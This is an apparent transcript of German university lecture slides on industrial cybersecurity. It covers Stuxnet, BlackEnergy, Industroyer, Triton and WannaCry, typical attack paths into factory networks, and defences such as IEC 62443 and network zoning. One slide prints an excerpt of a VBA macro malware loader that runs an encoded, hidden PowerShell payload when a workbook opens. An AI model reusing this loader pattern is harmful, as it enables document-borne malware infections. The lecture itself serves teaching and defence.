Von Uran, Keksen und Fahrrädern - Sicherheit und Industrie 4 · von uran, keksen und fahrrÄdern -...
Transcript of Von Uran, Keksen und Fahrrädern - Sicherheit und Industrie 4 · von uran, keksen und fahrrÄdern -...
VON URAN, KEKSEN UND FAHRRÄDERN -SICHERHEIT UND INDUSTRIE 4.0PROF. DR. TOBIAS HEER – HOCHSCHULE ALBSTADT-SIGMARINGEN
Photo
credit: Schill on V
isualhunt/ C
C B
Y
DISCLAIMER
� Einige der in diesem Foliensatz verwendeten Grafiken und Darstellungen sind urheberrechtlich geschützt. Sie wurden von mir gemäß §51 UrhG im Rahmen des 90‐minütigen Vortrages zum Zweck des Zitats verwendet und sind durch Quellenangaben gekennzeichnet.
� Von mir selbst erstellte Grafiken sind unter Namensnennung frei verwendbar (CC BY 3.0 DE)
2
ZU MEINER PERSON
� Tobias Heer
� Hochschule: Professor an der Hochschule Albstadt-Sigmaringen
� Netzwerke
� Kommunikationssicherheit
� Offensive Sicherheit
� Industrie: CTO Office bei Hirschmann Automation & Control
� Sicherheit von Industrienetzwerken
� Industrie 4.0
� Drahtlose Kommunikation, WLAN
� Arbeit im Bereich Industrie 4.0
� Plattform Industrie 4.0 – AG 3 – Sicherheit vernetzter Systeme
� ZVEI – Sicherheit Industrie 4.0
3
SICHERHEIT UND INDUSTRIE – EIN NEUES THEMA?
4
� Cyberangriffe auf Industrieanlagen gibt es bereits seit Jahrzehnten
� Besonders bekannt: Stuxnet
� Angriff auf Urananreicherung im Werk Natanz (Iran)
� Erste Stuxnet Version: November 2005
� Entdeckung von Stuxnet: ca. 2009
� Ende des Angriffs: Juni 2012
Quelle: http://blog.nuclearsecrecy.com/tag/centrifuges/
ZIEL VON STUXNET
5
� Störung der Urananreicherung zum Bau von Atombomben in Natanz, Iran
� Malware für Siemens SiematicSteuerungen
� Schließen von Ventilen
� Ändern der Rotationsgeschwindigkeit
� Ziel: nachhaltiges Verhindern derKernwaffenproduktion
� Unterbrechung des Produktions-prozesses
� Zerstörung der Produktions-mittel
Höher angereichertes Uran
U-238 (nicht kernwaffenfähig)
…
Gas
förm
iges
Ura
n-H
exaf
lour
ide
UF 6
(99,
3% U
ran
238,
0,7
% U
ran
235
Zivile N
utzung 4-5% U
-235A
tom
bom
be: 90% U
-235
…
…
Bild der Zentrifuge: Gemeinfrei, https://commons.wikimedia.org/w/index.php?curid=1257584
KOMPLEXITÄT DES STUXNET ANGRIFFS
6
� Angreifer bei Stuxnet: AdvancedPersistent Threat -Geheimdienste
� Stuxnet Eigenschaften
� Komplizierte Infektion über USB Sticks und infizierte Rechner
� Komplizierte Manipulation derAnlage
� Komplizierte Kommunikation
� Muss ich als Firma im schönen Schwabenländle Angst vor einem solchen Angreifer haben?
� Vermutlich eher nicht Ist nun alles gut?
Quelle: Byres Security
Kom
pliz
iert
er W
eg
CYBERSICHERHEIT UND KEKSPRODUKTION –WAS KANN DA SCHON SCHIEF GEHEN?
7Photo credit: John.E.Robertson on https://visualhunt.com/re/296b7d Visualhunt CC BY
ANGRIFF AUF EINE KANADISCHE KEKSFABRIK –AUGUST 2015 (INDUSTRIE 3.0)
� Annahme der Ingenieure: “Was soll schon passieren? Im schlimmsten Fall sind die Kekse ungenießbar. Da fällt uns eine Tagesproduktion aus.”
� Angreifer dringen ins Netzwerk einund beginnen damit dasNetzwerk zu analysieren
� Steuerungen wurden gestört
� Keine Kontrolle über die Anlage
� Keksteig trocknete in denRohren ein – die Rohre musstenherausgeschnitten werden
•8Photo on https://visualhunt.com/re/20b05cVisual Hunt
Beispielbild
ANGRIFFE AUF DIE INDUSTRIE
9
Ang
riffe
auf
Indu
stri
eanl
agen
Ang
riffe
auf
Indu
stri
ebet
rieb
e
OT
IT
Black Energy 3
Pow
er Ukraine
(Dez 2015)
HA
VEX
RA
T(Spio
nage, OPC
)(D
ez 2014)
Nig
ht D
rago
n (S
piona
ge, O
il& G
as)
(200
9)
Stuxnet(Iran, Siem
ens PLCs)
(2010)
Ope
ration
Aur
ora
(Sp
iona
ge
& M
anip
., Tec
h) (
2009
)
Sham
oon
(Sau
di A
rabi
anO
li /W
iper
)(2
012)
Wan
nacr
y (R
anso
mw
are)
(Mai
, 201
7)
Black Energy 2(Spio
nage)(D
ez 2010)
Wannacry
DB
, Renault, N
issan…(M
ai 2017)
ZeitD
eutsches Stahlwerk
(Sabotage)
(2014)
TR
ITO
N/T
RISIS/H
atMan
(Malw
are gegen SafetyFunktio
nen)
(Dez 2017)
Ang
riff
auf R
ussi
sche
In
dust
rieb
etri
ebe
(Nove
mbe
r, 20
17-2
018)
BfV
War
nung
vor
Ang
riffe
n au
dIn
dust
rieb
etri
ebe
(Jun
i, 20
18)
Industroyer
Pow
er Ukraine
(Dez 2016)
BLACKENERGY 2
10
� Blackenergy 2: Angriffe auf Industrieanlagen
� Primärer Fokus: HMI
� Siemens SIMATIC
� GE SIMPLICITY
� Advantech WebAccess
� Angriff gegen HMI Systeme die mit dem Internet verbunden waren
� Vorteil von Angriff auf HMI:
� Parameter können verändert werden
� Tatsächlicher Zustand der Anlage kann verschleiert werden
� Angreifer hat direkte Kontrolle über Internet-Verbindung
SCADA Interface einer Pumpensteuerung (bei shodan.io gefunden)
Originaler BlackEnergy Builder von 2007, Quelle: F-Secure.com
DRAGONFLY / HAVEX RAT
11
� Die Dragonfly Kampagne verwendete das HAVEX Remote Access Tool (HAVEX RAT)
� Ca. 2000 Anlagen infiziert
� Hauptsächlich Anlagen aus dem Bereich PT&D und Petrochemie
� Angriff hatte „nur“ Spionage als Ziel Keine Unterbrechung der Produktion
� Verwendung von OPC um Industrieanlagen auszuhorchen und zu kartografieren
� Möglichkeit weitere Module und Funktionennachzuladen
� Verbreitung über verschiedene Wege:
� Spam Mails (Spear Phishing)
� Watering Hole Attack: Austausch der Gerätesoftwareauf Webseiten der Hersteller
� Hersteller in De, Fr und Ru betroffen
� Remote Management Software
� Kamera-Software
� ICS Applikationen
Hersteller-ServerSW Downloads)
OPC Server in Anlage
Integrator /Wartung:SW Update
???
DEUTSCHES STAHLWERK 2014
12
� Erwähnung in BSI Lagebericht 2014
� Um welches Stahlwerk es sich handelt, wird nicht genannt.
� Der Vorfall blieb zunächst komplett geheim.
� Er wurde erst mit dem Lagebericht 2014 des Bundesamts für Sicherheit in der Informationstechnik bekannt
� Der Angriff führte dazu, dass ein Hochofen nicht mehr kontrolliert heruntergefahren werden konnte
� Die gesamte Anlage wurde schwer beschädigt
� Die genauen Schäden und Einzelheiten des Vorfalls wurden nicht veröffentlicht
Hochofen, Quelle: Wikipedia
VORGEHENSWEISE DER ANGREIFER (LAUT BSI)
Erstellung einer gefälschten
Webseite mit Login Feldern
Mail an Service-Firma, mit dem
Link zur gefälschten Webseite
Erhalt der Zugangsdaten des
Service-Technikers
Zugriff auf das Stahlwerk mit den
Anmeldedaten des
Servicetechnikers
Autor: Simon Luib (HS-Albsig)
Hierbei wird angegeben, man sei Kunde der Servicefirma und die Anlage habe ein Problem
Der Techniker wird auf die Original Seite umgeleitet, um keinen Verdacht zu schöpfen
13
Secure
Stahl
Benutzername
******* Hilfe Problem!
Secure
Stahl
Max Muster_
Sunshine
!!
BLACKENERGY 3 UND KIEW BLACKOUT 2015
14
� Angriff über Büro-Netzwerke des Energieversorgers Werchowna Rada
� Eindringen über Verbindungen zwischen Büro- und Produktionsnetzwerk
� Zerstörung von PC Systemen in den Anlagen durch KillDisk Malware
� Zerstörung von Seriell-zu-Ethernet Konvertern durch fehlerhafte Firmware
� Im Dezember 2015 wurden 225.000 Haushalte durch Blackenergy 3 vom Strom abgeschnitten
� Der Energieversorger benötigte 6 Stunden um die Anlagen wieder von Hand anzufahren
� In manchen Anlagen musste bis zu einem Jahr ein Handbetrieb gefahren werden
� Volle Automatisierung wurde erst nach einem Jahr wiederhergestellt
Umspannwerk, Quelle: Wikimedia[1]
STROMAUSFALL IN DER UKRAINE (23.12.2015):
15
E-Mails an Mitarbeiter des
Energieversorgers Werchowna Rada
mit dem ukrainischen Parlament als
vermeintlichem Absender.
Anhang: eine Word-Datei; Beim Öffnen
erschien die Meldung, die Word-Version sei veraltet, zum Aktualisieren müsse ein Makro
ausgeführt werden.
Makro installiert Black Energy 3
Malware. Anlage wird über Büronetz infiziert
und gestört.
Hallo, hier Parlament!
!!Zu alt!Bitte
aktualisieren!
MODERNE VBA MACRO MALWARE
16
Sub Workbook_Open()'VBA arch detect suggested by "T"Dim Command As StringDim str As StringDim exec As String
Arch = Environ("PROCESSOR_ARCHITECTURE")windir = Environ("windir")If Arch = "AMD64" Then
Command = windir + "\syswow64\windowspowershell\v1.0\powershell.exe"Else
Command = "powershell.exe"End If
str = "nVRtc9pGEP7Or9jRXGekMZLFS6iNxjMhOG7cBuIaYqdlmM4hLeji05"str = str + "18Otlgwn/vCquYfO0XnXa1t8+zu8+KPcIFvHcas0spr7NcG+"…str = str + "KmSLmksQx1vnFZ3oSwCbPXhZ67bE2LREan7XpeEw4gVWl05f"str = str + "iPQ4hNtm5WR1gtnC6tr0pJqtn/VfyJRMxp7zDWJOuzXjcMdz"str = str + "T9ON3u/gU="
exec = Command + " -NoP -NonI -W Hidden -Exec Bypass -Comm"exec = exec + "and ""Invoke-Expression $(New-Object IO.StreamRea"exec = exec + "der ($(New-Object IO.Compression.DeflateStream ("exec = exec + "$(New-Object IO.MemoryStream (,$([Convert]::From"exec = exec + "Base64String(\"" " & str & " \"" )))), [IO.Compr"exec = exec + "ession.CompressionMode]::Decompress)), [Text.Enc"exec = exec + "oding]::ASCII)).ReadToEnd();"""
Shell exec,vbHideEnd Sub
Macroshop Macro Code (Auszug)
CRASHOVERRIDE / INDUSTROYER
17
� Malware die spezifisch auf Industrieanlagen zugeschnitten ist
� Ist in der Lage Schaltkreisunterbrecher in Umspannwerken und Kraftwerken zu manipulieren
� Ziele in den Bereichen Energie-, Wasserversorgung und Verkehrssteuerung
� Erfolgreicher Angriff (Test?) verursachten einen großflächigen Stromausfall für 75 Minuten in Kiew/Ukraine am 17. Dezember 2016
� Siemens SIPROTEC Unterbrecher
� Anonyme Kommunikation über TOR Netzwerk
� Angriff auf Los Angeles Verkehrssteuerungssystem verursachte Staus
� Adaptive Malware mit vielen Erweiterungen für Protokolle in Industrieanlagen
� IEC 104, IEC 101, IEC 61850, OPC DA
Kraftwerk, Quelle: Wikimedia
INDUSTROYER / CRASHOVERRIDE MALWARE MAIN-BACKDOOR
Zusätzliches Backdoor
Zusätzliche ToolsMain-
Backdoor
Launcher
Data Wiper
101 Payload 104 Payload 61850 Payload OPC DA Payload
installiert kontrolliert
installiert
führt aus
führt aus
18Autor: Patrick Reck (HS-Albsig)
Einsatzbereit, falls die Main-Backdoor entdeckt wurde
Löscht Registry-Schlüssel, überschreibt Dateien, verwischt Spuren der Angreifer
führt aus
Überwacht und kontrolliert elektrische Systeme
Kann von den Angreifern stark angepasst/konfiguriert werden
Erzeugt eine Liste aller relevanten Geräte des Systems
Ermöglicht den Austausch und Veränderung der im System vorhandenen Komponenten
WANNACRY / WANNACRYPTOR
19
� Ransomware Wannacry
� Infektion von ungeschütztenWindows Systemen (bisWindows 7) weltweit
� Große Schäden in Industrie-Anlagen, Transportwesen,etc.
� Malware dringt in Intranetder Firma ein und verbreitetsich von dort aus aufSysteme die nicht aus demInternet erreichbar sind
� Spezialsysteme (Kassensysteme,Geldautomaten, Anzeigen, …)aufgrund schlechtem Patch-Standbesonders betroffen
� Nettes Detail: Der Angriff stammt aus demArsenal der amerikanischen Geheimdiensteund wurde 5 Jahre lang unbemerkt genutzt
� Ca. 3000 Infektionen vonIndustrie-Anlagen mitgewöhnlicher Malwarejährlich (https://dragos.com/blog/mimics/)
Anzeigetafeln bei der Deutschen Bahn:
Geldautomaten in China:
WANNA CRY - ÜBERSICHT
20
� Hintergrund:
� Veröffentlichungen auf Wiki Leaks über Schwachstellen im Windows Betriebssystem namens Eternalromance, -blue, -synergy.
� Höchst wahrscheinlich wurde Microsoft von der CIA über entwendete Zero Day Exploits gewarnt.
12. März 12. Mai14. April 13.Mai
Microsoft stellt vorsorglich einen Sicherheitspatch für unterstützte Systeme zur Verfügung
Veröffentlichung detaillierter ExploitAnleitungen
Experten warnen vor einem baldigem großangelegten Angriff
Erste Maleware unter Verwendung der veröffentlichtenSchwachstelle Eternalblue infiziert ein Krankenhaus in Großbritanien, ihr Name WannaCry
Ein entdeckter ,,Kill-switch‘‘ stoppte weitere Verbreitung in Netzwerken
Microsoft verteilt nachträglich kostenlose Updates für XP
Quelle: Heise-Security[1]
Autor: Daniel Grimm (HS-Albsig)
AUSWIRKUNGEN VON WANNACRY
21
� 147 Varianten von WannaCry wurden gefunden (Quelle: AV Test)
� Schaden geht in die Milliarden
� Krankenhäuser in GB mussten Betrieb einschränken
� Ausfall der Fahrkartenautomaten und Anzeigetafeln der DB
� Innenministerium in Russland meldete 1.000 infizierte Rechner
� Renault stoppt Produktion in einigen Werken
� Nissan Werk Sunderland wurde infiziert
� Tankstellen und Geldautomaten in China konnten keine Transaktionen durchführen
� Telefónica, FedEx, Stahlkonzern Sandvik und viele weitere Betriebe betroffen
� Nur ca. 30.000 EUR Lösegeld erzielt
� War das Ziel wirklich das Lösegeld?
ANGRIFF AUF INDUSTRIEANLAGE IN MITTLEREN OSTEN
22
� Bekannt unter Triton, Trisis und HatMan
� Angriff auf Safety System: Schneider Electric’s Triconex Safety InstrumentedSystem (SIS), Triconex 3008 Processor
� Safety System stellt die Funktionale Sicherheit in der Anlage her. Störung der Safety-Funktion kann zu Stillstand, Beschädigung der Anlage, Verschmutzung der Umwelt oder Verletzungen und Tod führen.
� Interpretation des Angriffs: Angreifer hatte nicht nur vor die Anlage zu stoppen (dies hätte er einfacher tun können).
� Die Versuche die Steuerung zu übernehmen deuten darauf hin, dass die Safety Funktion gestört werden sollte.
� Es deutet darauf hin, dass versucht wurde die Safety Funktionen, die im Fall eines Problems ablaufen zu verändern.
MES
ERP
SCADA
SPS
Feldgeräte Safety-kritischeFunktionen
Aut
om
atis
ieru
ngsp
yram
ide
TRITON, TRISIS UND HATMAN
23
� Angreifer erlangten Kontrolle über einen Windows PC mit Zugang zum Programmierinterface der Sicherheitssteuerung
� Es wurde eine Malware ausgeführt, welche die Sicherheitssteuerung umprogrammieren kann
� Zwei Binaries für die Steuerung waren in der Malware enthalten: inject.bin und imain.bin. Sie enthielten veränderten Steuerungs und Konntroll-Code
� Malware konnte auf Safety Controller aufgespielt werden (Controller im Programming Mode)
� Die Malware wurde konnte nicht erfolgreich auf dem Controller ausgeführt werden. Nach leichten Moifikationen durch die Sicherheitsforscher war sie jedoch im Labor lauffähig.
� Malware wurde nicht durch Anti-Virus Scanner entdeckt
MES
ERP
SCADA
SPS
Feldgeräte
Safety-kritischeFunktionen
Aut
om
atis
ieru
ngsp
yram
ide
trilog.exe
imain.bininject.bin
SICHERHEIT UND INDUSTRIE 4.0?
24
… UND MIT INDUSTRIE 4.0?
25
� Kundenspezifische Produktion:
� Kunden können ihre eigenen Kekse bestellen?
� Wandelbare Produktion:
� Neue Zusammenstellung von Maschinen und Abläufen
� Stichwort Plug & Produce
� Wertschöpfungsnetzwerke
� Engere operative Zulieferer – Produzenten-Beziehungen
� Kommunikation über Unternehmensgrenzen
� Kommunikation über Standortgrenzen
� Dienstleister in der Fertigung
Firma A
Firma BFirma C
++
TSN(IEEE EchtzeitEthernet)
Internet
I-4.0 - NEUE KOMMUNIKATIONSSTRUKTUREN
Pub/Sub
OPC-UA
MES
ERP
SCADA
SPS
Feldgeräte
Automatisierungspyramide Industrie 4.0 Kommunikation
Cloud
Partner
LocalCloud
Unternehmensebene
Betriebsleitebene
Prozessleitebene
Steuerungsebene
Feldebene
Gefahren
26
EVOLUTION UND VERFEINERUNG DER ANGRIFFSWERKZEUGE
27
Zeit…. 1990 1995 2000 2005 2010 2015 Heute
Ars
enal
der
Ang
reife
r /
Vie
lfalt d
er A
ngri
ffe /
Notw
endi
ge V
erte
idig
ung
TYPISCHE ANGRIFFSWEGE IN EINER INDUSTRIE-ANLAGE
28
Internet
FeldebeneKontroll LAN
InfizierterMaintenanceLaptop
Fehlende Zonierung
Fehlende Zonierung / Fehlende ACLs /Fehlende NAC
Unzureichende Isolation drahtloser Netzwerke
Schatten IT /schlecht gesicherte Modems /WLANs
Fehlende Zonierung
InfizierterRechner
Infizierte USBSticks
Fehlende NAC
UnauthorisierteVerbindungen
UngeschützteNetzwerkLaufwerke(z.B. mit Software /Updates)
Watering hole Attack
Fabrik Netz
3rd Party
3rd PartyProbleme
Office LAN
Schlecht geschützerRemote Access /Infizierte Rechner
Unverschlüsselte Kommunikation zwischen OPC Server/Client
Fehlende Benutzer-Authentifizierung
Safety-Controlleraus Fabriknetzansprechbar
UnzureichendeNAC
Default Konfigurationen /unsichere Konfigurationen
OT
IT
29
Ang
riffe
auf
Indu
stri
eanl
agen
Ang
riffe
auf
Indu
stri
ebet
rieb
e
OT
IT
Black Energy 3
Pow
er Ukraine
(Dez 2015)
HA
VEX
RA
T(Spio
nage, OPC
)(D
ez 2014)
Nig
ht D
rago
n (S
piona
ge, O
il& G
as)
(200
9)
Stuxnet(Iran, Siem
ens PLCs)
(2010)
Ope
ration
Aur
ora
(Sp
iona
ge
& M
anip
., Tec
h) (
2009
)
Sham
oon
(Sau
di A
rabi
anO
li /W
iper
)(2
012)
Wan
nacr
y (R
anso
mw
are)
(Mai
, 201
7)
Black Energy 2(Spio
nage)(D
ez 2010)
Wannacry
DB
, Renault, N
issan…(M
ai 2017)
ZeitD
eutsches Stahlwerk
(Sabotage)
(2014)
TR
ITO
N/T
RISIS/H
atMan
(Malw
are gegen SafetyFunktio
nen)
(Dez 2017)
Ang
riff
auf R
ussi
sche
In
dust
rieb
etri
ebe
(Nove
mbe
r, 20
17-2
018)
BfV
War
nung
vor
Ang
riffe
n au
dIn
dust
rieb
etri
ebe
(Jun
i, 20
18)
GEGENMASSNAHMENWIE VERHINDERT MAN DAS SCHLIMMSTE?
30
WIE MACHT MAN COMPUTER, NETZWERKE UND FIRMEN SICHER?
� Verschiedene Sicherheitsmaßnahmen wirken auf unterschiedliche Art und Weise:
� Präventiv:
� Gute Passwörter, aktuelle Software, Anti-Virus, Schulungen, …
� Detektierend
� Intrusion Detection System, Systemüberwachung, Kontrolle
� Reaktiv
� Incident Response Team, Anti-Virus, Intrusion Prevention System
31Photos on Visualhunt https://visualhunt.com/re/d04967 , DocChewbacca on Visualhunt / CC BY-NC-SA,
Jay Phagan on VisualHunt.com / CC BY
ISO/IEC 62443 SICHERHEITS-NORM FÜR DIE INDUSTRIE
32
NACHHALTIGE SICHERHEIT PDCA (THEORIE)
33
PLAN
DO
CHECK
ACT
NACHHALTIGE SICHERHEIT PDCA (REALITÄT)
34
PLAN(something)
DO(little)
CHECK(nothing)
ACT(never / too late)
SCHLÜSSELMASSNAHMEN FÜR TECHNISCHE IT SICHERHEIT
� Systemsicherheit
� Aktuelle Software und Security-Patches verwenden
� Richtige initiale Konfiguration der Geräte (z.B. Default Passwörter ändern)
� Reduktion der Angriffsfläche (nicht gebrauchte Funktionen abschalten), Whitelisting
� Ereignisprotokollierung aktivieren
� Netzwerksicherheit
� Netzwerk über Firewalls und VLAN in Zonen aufteilen
� Verwendung von verschlüsselten Verbindungen
� Authentifizierung von End-Geräten durch Zertifikate
� Überwachung des Netzwerks auf verdächtige Aktivitäten (IDS)
� Sicherheit der Anlage
� Sicherheitskonzept ausarbeiten, dokumentieren und leben
� Ereignisprotokolle der Geräte zentral sammeln und auswerten
� Notfallprozeduren festlegen und üben
35
STUDIENGANG IT SECURITY HS-ALBSIG
� Studieninhalte:
� IT Sicherheit und Prozesse
� Netzwerke, Netzwerksicherheit
� Betriebssysteme, Systemsicherheit
� Offensive Sicherheit
� Forensik
� Kryptografie
� Berufsbilder:
� Security Analyst
� IT Security Officer (ISO)
� Security Engineer (Entwickler)
� Security - Auditor
� Penetrationstester
� Projekte
� HSAS-Honeynet
� Beobachten realer Angreifer auf Köder-Infrastruktur
� Produkt Honeynet / Farm
� Beobachten des Umgangs von Angreifern mit (Kommunikations-) Produkten
� Sichere Industrienetze mit OPC UA
� Handhabbare Sicherheit mit OPC UA
� Testbed mit NAC, Zertifikatsbasiertem Zugriff, nachhaltiger Sicherheitspflege
36
ZUSAMMENFASSEND: DIE SACHE MIT DER IT SICHERHEIT
37
� IT Security ist ein Katz- und Maus- Spiel zwischen Angreifern und Verteidigern
� Neue Angriffe Neue Verteidigung Neue Angriffe
� Die Ausgangslage ist nicht besonders günstig
� Verteidigung: alle Teile eines Systems müssen zu jeder Zeit sicher sein
� Angriff: es genügt wenn ein Teil eines Systems momentan unsicher ist
� Es gibt keine Wunderwaffen in der IT Sicherheit
� Mitdenken ist gefragt!
Was ist das Allerwichtigste wenn man sein Rad vor Diebstahl schützen will?
Gesunder Menschenverstand!